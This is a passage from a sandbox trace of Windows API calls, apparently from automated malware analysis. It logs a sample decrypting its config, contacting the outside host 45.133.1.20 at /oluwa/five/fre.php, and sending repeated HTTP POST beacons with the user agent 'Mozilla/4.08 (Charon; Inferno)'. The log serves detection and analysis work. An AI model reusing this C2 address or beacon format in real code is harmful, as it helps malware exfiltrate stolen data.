pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.658] GetProcessHeap () returned 0x6a0000 [0321.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0321.659] GetProcessHeap () returned 0x6a0000 [0321.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.662] GetProcessHeap () returned 0x6a0000 [0321.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0321.662] GetProcessHeap () returned 0x6a0000 [0321.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0321.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0321.680] GetProcessHeap () returned 0x6a0000 [0321.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0321.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.681] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.682] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.683] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.683] GetProcessHeap () returned 0x6a0000 [0321.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0321.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.684] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0321.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.685] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.686] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0321.686] GetProcessHeap () returned 0x6a0000 [0321.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.687] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0321.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.688] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0321.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.689] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0321.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.690] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0321.690] GetProcessHeap () returned 0x6a0000 [0321.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.690] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0321.690] GetProcessHeap () returned 0x6a0000 [0321.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0321.690] socket (af=2, type=1, protocol=6) returned 0xc80 [0321.690] connect (s=0xc80, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0321.716] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0321.716] GetProcessHeap () returned 0x6a0000 [0321.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0321.716] GetProcessHeap () returned 0x6a0000 [0321.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0321.717] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.718] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.718] GetProcessHeap () returned 0x6a0000 [0321.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df6e8 [0321.718] GetProcessHeap () returned 0x6a0000 [0321.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.718] GetProcessHeap () returned 0x6a0000 [0321.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0321.718] GetProcessHeap () returned 0x6a0000 [0321.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0321.719] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.720] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.720] GetProcessHeap () returned 0x6a0000 [0321.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0321.720] GetProcessHeap () returned 0x6a0000 [0321.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.721] send (s=0xc80, buf=0x6bd460*, len=242, flags=0) returned 242 [0321.722] send (s=0xc80, buf=0x6bb998*, len=159, flags=0) returned 159 [0321.722] GetProcessHeap () returned 0x6a0000 [0321.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0321.722] recv (in: s=0xc80, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0321.811] GetProcessHeap () returned 0x6a0000 [0321.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0321.811] GetProcessHeap () returned 0x6a0000 [0321.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0321.811] GetProcessHeap () returned 0x6a0000 [0321.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df6e8 | out: hHeap=0x6a0000) returned 1 [0321.811] GetProcessHeap () returned 0x6a0000 [0321.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0321.812] closesocket (s=0xc80) returned 0 [0321.812] GetProcessHeap () returned 0x6a0000 [0321.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0321.812] GetProcessHeap () returned 0x6a0000 [0321.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.813] GetProcessHeap () returned 0x6a0000 [0321.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0321.813] GetProcessHeap () returned 0x6a0000 [0321.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0321.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19e8) returned 0xc80 [0321.815] Sleep (dwMilliseconds=0xea60) [0321.817] GetProcessHeap () returned 0x6a0000 [0321.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0321.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.819] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0321.846] GetProcessHeap () returned 0x6a0000 [0321.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0321.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.847] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0321.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.849] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.852] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.852] GetProcessHeap () returned 0x6a0000 [0321.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0321.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.853] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0321.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.854] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0321.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.855] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0321.855] GetProcessHeap () returned 0x6a0000 [0321.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.858] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.859] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.860] GetProcessHeap () returned 0x6a0000 [0321.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0321.860] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.860] GetProcessHeap () returned 0x6a0000 [0321.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0321.861] GetProcessHeap () returned 0x6a0000 [0321.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0321.861] GetProcessHeap () returned 0x6a0000 [0321.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0321.861] GetProcessHeap () returned 0x6a0000 [0321.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0321.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.863] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.869] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0321.880] GetProcessHeap () returned 0x6a0000 [0321.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0321.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.881] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0321.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.882] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.885] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.885] GetProcessHeap () returned 0x6a0000 [0321.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0321.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.887] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0321.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.888] CryptDestroyKey (hKey=0x6ad020) returned 1 [0321.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0321.889] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0321.889] GetProcessHeap () returned 0x6a0000 [0321.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0321.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.896] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0321.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.897] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0321.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.898] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0321.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0321.899] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0321.899] GetProcessHeap () returned 0x6a0000 [0321.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0321.899] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0321.899] GetProcessHeap () returned 0x6a0000 [0321.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0321.899] socket (af=2, type=1, protocol=6) returned 0xc84 [0321.900] connect (s=0xc84, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0321.929] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0321.929] GetProcessHeap () returned 0x6a0000 [0321.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0321.929] GetProcessHeap () returned 0x6a0000 [0321.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0321.931] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.932] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.932] GetProcessHeap () returned 0x6a0000 [0321.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df928 [0321.932] GetProcessHeap () returned 0x6a0000 [0321.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.933] GetProcessHeap () returned 0x6a0000 [0321.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0321.933] GetProcessHeap () returned 0x6a0000 [0321.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0321.935] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0321.936] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.938] GetProcessHeap () returned 0x6a0000 [0321.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0321.938] GetProcessHeap () returned 0x6a0000 [0321.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0321.939] send (s=0xc84, buf=0x6bd460*, len=242, flags=0) returned 242 [0321.940] send (s=0xc84, buf=0x6bb998*, len=159, flags=0) returned 159 [0321.940] GetProcessHeap () returned 0x6a0000 [0321.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0321.940] recv (in: s=0xc84, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0322.019] GetProcessHeap () returned 0x6a0000 [0322.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0322.022] GetProcessHeap () returned 0x6a0000 [0322.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0322.022] GetProcessHeap () returned 0x6a0000 [0322.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df928 | out: hHeap=0x6a0000) returned 1 [0322.023] GetProcessHeap () returned 0x6a0000 [0322.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0322.024] closesocket (s=0xc84) returned 0 [0322.024] GetProcessHeap () returned 0x6a0000 [0322.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0322.025] GetProcessHeap () returned 0x6a0000 [0322.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0322.026] GetProcessHeap () returned 0x6a0000 [0322.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0322.026] GetProcessHeap () returned 0x6a0000 [0322.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0322.027] CreateThread (lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08) Thread: id = 9 os_tid = 0x850 Thread: id = 10 os_tid = 0xf74 [0135.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0135.337] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:03:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0135.337] GetProcessHeap () returned 0x6a0000 [0135.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0135.337] GetProcessHeap () returned 0x6a0000 [0135.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0135.337] GetProcessHeap () returned 0x6a0000 [0135.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 11 os_tid = 0xe10 [0145.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.698] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:03:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0145.698] GetProcessHeap () returned 0x6a0000 [0145.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0145.698] GetProcessHeap () returned 0x6a0000 [0145.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0145.698] GetProcessHeap () returned 0x6a0000 [0145.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 12 os_tid = 0x135c [0155.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0155.973] GetProcessHeap () returned 0x6a0000 [0155.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0155.973] GetProcessHeap () returned 0x6a0000 [0155.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0155.974] GetProcessHeap () returned 0x6a0000 [0155.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 13 os_tid = 0x1360 [0156.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.186] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.191] GetProcessHeap () returned 0x6a0000 [0156.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0156.192] GetProcessHeap () returned 0x6a0000 [0156.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0156.192] GetProcessHeap () returned 0x6a0000 [0156.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 14 os_tid = 0x1378 [0156.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.453] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.453] GetProcessHeap () returned 0x6a0000 [0156.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0156.453] GetProcessHeap () returned 0x6a0000 [0156.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0156.453] GetProcessHeap () returned 0x6a0000 [0156.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 15 os_tid = 0xfd0 [0156.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.665] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; 